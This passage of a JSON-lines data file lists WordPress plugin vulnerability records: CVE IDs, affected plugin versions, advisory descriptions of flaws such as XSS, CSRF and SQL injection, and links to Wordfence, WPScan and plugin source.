\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6968","slug":"the-moneytizer","versionImpact":"9.5.20","description":"The Moneytizer plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 9.5.20. This is due to missing or incorrect nonce validation on multiple AJAX functions. This makes it possible for unauthenticated attackers to update and retrieve billing and bank details, update and reset the plugin's settings, and update languages as well as other lower-severity actions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/14351561-bd31-4aaa-931a-e72917458013?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/14351561-bd31-4aaa-931a-e72917458013?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/the-moneytizer\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/the-moneytizer\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6852","slug":"wp-multitasking","versionImpact":"0.1.12","description":"The WP MultiTasking WordPress plugin through 0.1.12 does not have a CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e6c7c153-8080-40b3-85e2-604ce7c66e32\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e6c7c153-8080-40b3-85e2-604ce7c66e32\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9361","slug":"bulk-image-resizer","versionImpact":"2.0.1","description":"The Bulk images optimizer: Resize, optimize, convert to webp, rename \u2026 plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'save_configuration' function in all versions up to, and including, 2.0.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update plugin options.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a189e436-e8af-4379-aa6e-2d1a4a2d4bfa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a189e436-e8af-4379-aa6e-2d1a4a2d4bfa?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bulk-image-resizer\\\/trunk\\\/includes\\\/class-bir-loader.php#L44\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bulk-image-resizer\\\/trunk\\\/includes\\\/class-bir-loader.php#L44\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11119","slug":"bne-gallery-extended","versionImpact":"1.2.1","description":"The BNE Gallery Extended plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gallery' shortcode in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bne-gallery-extended\\\/trunk\\\/bne-gallery-extended.php#L178\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bne-gallery-extended\\\/trunk\\\/bne-gallery-extended.php#L178\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3191705\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3191705\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bne-gallery-extended\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bne-gallery-extended\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f9277d8-ac81-4950-a1e5-4e6c6b042f84?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f9277d8-ac81-4950-a1e5-4e6c6b042f84?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2019-25221","slug":"responsive-filterable-portfolio","versionImpact":"1.0.8","description":"The Responsive Filterable Portfolio plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in all versions up to, and including, 1.0.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/responsive-filterable-portfolio\\\/tags\\\/1.0.8&new_path=\\\/responsive-filterable-portfolio\\\/tags\\\/1.0.9&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/responsive-filterable-portfolio\\\/tags\\\/1.0.8&new_path=\\\/responsive-filterable-portfolio\\\/tags\\\/1.0.9&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/responsive-filterable-portfolio\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/responsive-filterable-portfolio\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97827e26-d418-4c96-b0d0-10b92a4513bd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97827e26-d418-4c96-b0d0-10b92a4513bd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12314","slug":"rapid-cache","versionImpact":"1.2.3","description":"The Rapid Cache plugin for WordPress is vulnerable to Cache Poisoning in all versions up to, and including, 1.2.3. This is due to plugin storing HTTP headers in the cached data. This makes it possible for unauthenticated attackers to poison the cache with custom HTTP headers that may be unsanitized which can lead to Cross-Site Scripting.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/rapid-cache\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/rapid-cache\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72b777ac-1870-4588-82fe-da96a784ec81?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72b777ac-1870-4588-82fe-da96a784ec81?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13875","slug":"wp-programmmanager","versionImpact":"1.2","description":"The WP-PManager WordPress plugin through 1.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/82c54fb5-f1d9-4bae-a3de-d4335809b81c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/82c54fb5-f1d9-4bae-a3de-d4335809b81c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3434","slug":"smtp-amazon-ses","versionImpact":"1.8","description":"The SMTP for Amazon SES \u2013 YaySMTP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Email Logs in all versions up to, and including, 1.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smtp-amazon-ses\\\/trunk\\\/includes\\\/Functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smtp-amazon-ses\\\/trunk\\\/includes\\\/Functions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smtp-amazon-ses\\\/trunk\\\/includes\\\/Helper\\\/Utils.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smtp-amazon-ses\\\/trunk\\\/includes\\\/Helper\\\/Utils.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3270161\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3270161\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/smtp-amazon-ses\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/smtp-amazon-ses\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78ac91af-4d71-43f4-b9fc-cf5e6874e7de?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78ac91af-4d71-43f4-b9fc-cf5e6874e7de?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2247","slug":"wp-programmmanager","versionImpact":"1.2","description":"The WP-PManager WordPress plugin through 1.2 does not have a CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3974c5c3-887e-46bd-aad7-4f3169bff6de\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3974c5c3-887e-46bd-aad7-4f3169bff6de\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4219","slug":"dpepress","versionImpact":"0.3","description":"The DPEPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'dpe' shortcode in all versions up to, and including, 0.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dpepress\\\/trunk\\\/dpepress.php#L72\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dpepress\\\/trunk\\\/dpepress.php#L72\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ccd273dc-9de3-4863-a787-db653f2003ca?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ccd273dc-9de3-4863-a787-db653f2003ca?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5084","slug":"ajax-filter-posts","versionImpact":"3.4.13","description":"The Post Grid Master plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018argsArray['read_more_text']\u2019 parameter in all versions up to, and including, 3.4.13 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/Fr1t0viski\\\/PoCs\\\/blob\\\/main\\\/XSS_GridMaster\",\"name\":\"https:\\\/\\\/github.com\\\/Fr1t0viski\\\/PoCs\\\/blob\\\/main\\\/XSS_GridMaster\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ajax-filter-posts\\\/tags\\\/3.4.13\\\/inc\\\/functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ajax-filter-posts\\\/tags\\\/3.4.13\\\/inc\\\/functions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ajax-filter-posts\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ajax-filter-posts\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08137a9e-6e4d-4ca6-954e-e98a44b0c9be?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08137a9e-6e4d-4ca6-954e-e98a44b0c9be?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-28660","slug":"events-made-easy","versionImpact":"2.3.14","description":"The Events Made Easy WordPress Plugin, version <= 2.3.14 is affected by an authenticated SQL injection vulnerability in the 'search_name' parameter in the eme_recurrences_list action.","refs":"[{\"url\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2023-2\",\"name\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2023-2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1375","slug":"wp-fastest-cache","versionImpact":"1.1.2","description":"The WP Fastest Cache plugin for WordPress is vulnerable to unauthorized cache deletion in versions up to, and including, 1.1.2 due to a missing capability check in the deleteCacheToolbar function. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to delete the site's cache.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2893158%40wp-fastest-cache&new=2893158%40wp-fastest-cache&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2893158%40wp-fastest-cache&new=2893158%40wp-fastest-cache&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae643666-70cb-4eb4-a183-e1649264ded4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae643666-70cb-4eb4-a183-e1649264ded4?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php#L866\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php#L866\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5357","slug":"instagram-for-wordpress","versionImpact":"2.1.6","description":"The Instagram for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcodes in versions up to, and including, 2.1.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3991d8d0-57a8-42e7-a53c-97508f7e137f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3991d8d0-57a8-42e7-a53c-97508f7e137f?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/instagram-for-wordpress\\\/tags\\\/2.1.6\\\/templates\\\/instagramPost.php#L12\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/instagram-for-wordpress\\\/tags\\\/2.1.6\\\/templates\\\/instagramPost.php#L12\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1808","slug":"shortcodes-ultimate","versionImpact":"7.0.3","description":"The WP Shortcodes Plugin \u2014 Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'su_qrcode' shortcode in all versions up to, and including, 7.0.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96769a0e-d4a9-4196-8ded-b600046c0943?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96769a0e-d4a9-4196-8ded-b600046c0943?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3041647\\\/shortcodes-ultimate\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3041647\\\/shortcodes-ultimate\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1071","slug":"ultimate-member","description":"The Ultimate Member \u2013 User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to SQL Injection via the 'sorting' parameter in versions 2.1.3 to 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/005fa621-3c49-4c23-add5-d6b7a9110055?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/005fa621-3c49-4c23-add5-d6b7a9110055?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/tags\\\/2.8.2\\\/includes\\\/core\\\/class-member-directory-meta.php?rev=3022076\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/tags\\\/2.8.2\\\/includes\\\/core\\\/class-member-directory-meta.php?rev=3022076\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/tags\\\/2.8.2\\\/includes\\\/core\\\/class-member-directory-meta.php?rev=3022076#L666\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/tags\\\/2.8.2\\\/includes\\\/core\\\/class-member-directory-meta.php?rev=3022076#L666\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/tags\\\/2.8.2\\\/includes\\\/core\\\/class-member-directory-meta.php?rev=3022076#L858\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/tags\\\/2.8.2\\\/includes\\\/core\\\/class-member-directory-meta.php?rev=3022076#L858\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-member\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-member\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3038036\\\/ultimate-member\\\/trunk\\\/includes\\\/core\\\/class-member-directory-meta.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3038036\\\/ultimate-member\\\/trunk\\\/includes\\\/core\\\/class-member-directory-meta.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6966","slug":"the-moneytizer","versionImpact":"9.5.20","description":"The The Moneytizer plugin for WordPress is vulnerable to unauthorized access of data, modification of data, and loss of data due to a missing capability check on multiple AJAX functions in the \/core\/core_ajax.php file in all versions up to, and including, 9.5.20. This makes it possible for authenticated attackers, with subscriber access and above, to update and retrieve billing and bank details, update and reset the plugin's settings, and update languages as well as other lower-severity actions.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/71823e36-3899-4253-a1d2-c6f8921d18dc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/71823e36-3899-4253-a1d2-c6f8921d18dc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-moneytizer\\\/trunk\\\/core\\\/core_ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-moneytizer\\\/trunk\\\/core\\\/core_ajax.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9350","slug":"woo-shipping-dpd-baltic","versionImpact":"1.2.83","description":"The DPD Baltic Shipping plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'search_value' parameter in all versions up to, and including, 1.2.83 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6251d0f6-b536-4122-8fdf-bb77665a4f41?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6251d0f6-b536-4122-8fdf-bb77665a4f41?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-shipping-dpd-baltic\\\/trunk\\\/includes\\\/class-dpd.php#L318\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-shipping-dpd-baltic\\\/trunk\\\/includes\\\/class-dpd.php#L318\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11091","slug":"support-svg","versionImpact":"1.1.0","description":"The Support SVG \u2013 Upload svg files in wordpress without hassle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REST API SVG File uploads in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3195829\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3195829\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/support-svg\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/support-svg\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9207baf-348c-4d3b-a6f0-cbfcd2624f78?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9207baf-348c-4d3b-a6f0-cbfcd2624f78?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0394","slug":"groundhogg","versionImpact":"3.7.3.5","description":"The WordPress CRM, Email & Marketing Automation for WordPress | Award Winner \u2014 Groundhogg plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the gh_big_file_upload() function in all versions up to, and including, 3.7.3.5. This makes it possible for authenticated attackers, with Author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/tags\\\/3.7.3.5\\\/includes\\\/big-file-uploader.php#L117\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/tags\\\/3.7.3.5\\\/includes\\\/big-file-uploader.php#L117\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3221208\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3221208\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/groundhogg\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/groundhogg\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2cf3b85-2e2d-43dc-9877-9a740d4fd2fb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2cf3b85-2e2d-43dc-9877-9a740d4fd2fb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4217","slug":"wp-youtube-video-optimizer","versionImpact":"1.2","description":"The WP YouTube Video Optimizer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ib_youtube' shortcode in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-youtube-video-optimizer\\\/trunk\\\/wp-youtube-video-optimizer.php#L20\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-youtube-video-optimizer\\\/trunk\\\/wp-youtube-video-optimizer.php#L20\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/71a933ef-f49d-4520-90d5-9957f72d7452?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/71a933ef-f49d-4520-90d5-9957f72d7452?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4608","slug":"structured-content","versionImpact":"1.6.4","description":"The Structured Content plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's sc_fs_local_business shortcode in all versions up to, and including, 1.6.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/structured-content\\\/tags\\\/1.6.4\\\/class-structuredcontent.php#L188\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/structured-content\\\/tags\\\/1.6.4\\\/class-structuredcontent.php#L188\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/structured-content\\\/tags\\\/1.6.4\\\/templates\\\/shortcodes\\\/local-business.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/structured-content\\\/tags\\\/1.6.4\\\/templates\\\/shortcodes\\\/local-business.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/structured-content\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/structured-content\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8c60701-37f0-4404-b965-9136ac456e38?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8c60701-37f0-4404-b965-9136ac456e38?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
